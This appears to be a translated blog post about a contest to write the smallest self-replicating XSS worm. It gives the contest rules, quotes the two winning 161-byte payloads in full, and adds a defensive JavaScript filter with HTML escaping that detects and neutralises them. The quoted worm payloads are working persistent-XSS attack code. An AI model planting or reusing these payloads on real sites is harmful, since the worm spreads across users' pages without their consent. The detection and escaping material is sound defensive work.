
XSS worm: who can go smaller?

The other day I came across news of a contest whose goal was to write the smallest possible JavaScript code that copies itself onward. The contest is run by Robert Hansen, aka RSnake, a well-known information security specialist.

Conditions

Under the terms of the contest, the code had to meet the following requirements:

  1. Must be UTF-8 or ISO-8859-1 encoded.
  2. Must replicate by sending a POST request (no GETs) to the post.php page on the same domain it runs from. The text parameter must be named content. Assume that post.php will unescape your code accordingly.
  3. Must not grow in size as it spreads (if the code starts at n bytes, it must not become n + x bytes on the next hop); i.e. assume that post.php will discard any content longer than n bytes.
  4. Must execute as written (any other parameters needed for a particular injection context can be added later).
  5. Must not rely on cookies or query-string GET parameters (the entire code lives on the page itself, as a persistent XSS).
  6. Must not assume anything about the DOM tree, although class or id may be used if they appear in the worm code itself. Looking up the n-th script on the page is not allowed, since that varies from site to site.
  7. Must work at least in Internet Explorer 7.0 and Firefox 2.x.
  8. Must show XSS as a message on the page (as its "payload").
  9. Must work at least on Apache 1.3+ and Apache 2+ (i.e. not use server-specific features of other servers), given their market dominance.
  10. Must work without user interaction, or with minimal interaction that occurs on every page (for example, a mouseover anywhere on the page).


The contest

The contest ran from January 4 to January 10. The author received several hundred entries, but only two of them were minimal and worked under all the stated conditions:

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+
innerHTML.slice(action=(method='post')+'.php',155)))">


and

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value=
'<form>'+innerHTML.slice(alert('XSS'),155))">


Both worms are 161 bytes long. As the code shows, the two entries are very similar, practically identical character for character. The contest's full write-up is linked from the original post.

Results

Based on the results, RSnake published a short note attempting to summarize how one can defend against such worms (after all, minimal code that works as efficiently as possible will share some common signatures).
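To make that point concrete, here is an added example (not from the post and not RSnake's code): a filter that checks a submitted message for the structural traits the contest conditions force on a minimal worm, run over the two winning entries quoted above as constructed sample input, together with the output escaping that stops post.php from rendering the payload as markup.

```javascript
// Added example, not from the original post or from RSnake: each rule below is a
// trait the contest conditions impose on a minimal worm (inline handler, a form
// with an input named "content", a scripted POST, self-copying via innerHTML).
const SIGNATURES = [
  { name: "inline event handler", re: /\bon[a-z]+\s*=/i },
  { name: "form element", re: /<form\b/i },
  { name: "input named content", re: /<input\b[^>]*\bname\s*=\s*["']?content\b/i },
  { name: "scripted form submission", re: /\bsubmit\s*\(/i },
  { name: "self-reference via innerHTML", re: /\binnerHTML\b/i },
  { name: "POST method set from script", re: /\bmethod\s*=\s*["']post["']/i },
];

// Returns the names of the signatures a submitted message matches.
function findWormSignatures(content) {
  return SIGNATURES.filter(s => s.re.test(content)).map(s => s.name);
}

// A message is treated as a replication attempt when it carries at least
// `threshold` traits; one inline handler on its own is merely suspicious.
function isLikelyWorm(content, threshold = 3) {
  return findWormSignatures(content).length >= threshold;
}

// Mitigation: post.php must never echo submitted text as markup. Escaping the
// five HTML metacharacters leaves the payload as inert text, so the browser
// never creates the <img onerror> that drives the replication loop.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, c => map[c]);
}

// Constructed sample input: the two 161-byte winners quoted in the post (joined
// onto one line each) and a benign comment.
const WORM_1 = `<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">`;
const WORM_2 = `<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">`;
const BENIGN = "Nice write-up, the contest rules were strict!";

for (const msg of [WORM_1, WORM_2, BENIGN]) {
  console.log(isLikelyWorm(msg) ? "BLOCK" : "ALLOW", findWormSignatures(msg));
}
```

Signature matching alone is brittle (a worm can be rewritten to dodge any fixed pattern), which is why the escaping step is the real control and the filter is only an early-warning layer.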

He also published a large article on the problem of XSS worms in general, arguing that dealing with them is very hard, but possible. It is rather long, but very interesting.

Thank you for your attention. I would be glad to hear your comments.


Source: https://habr.com/ru/post/18906/
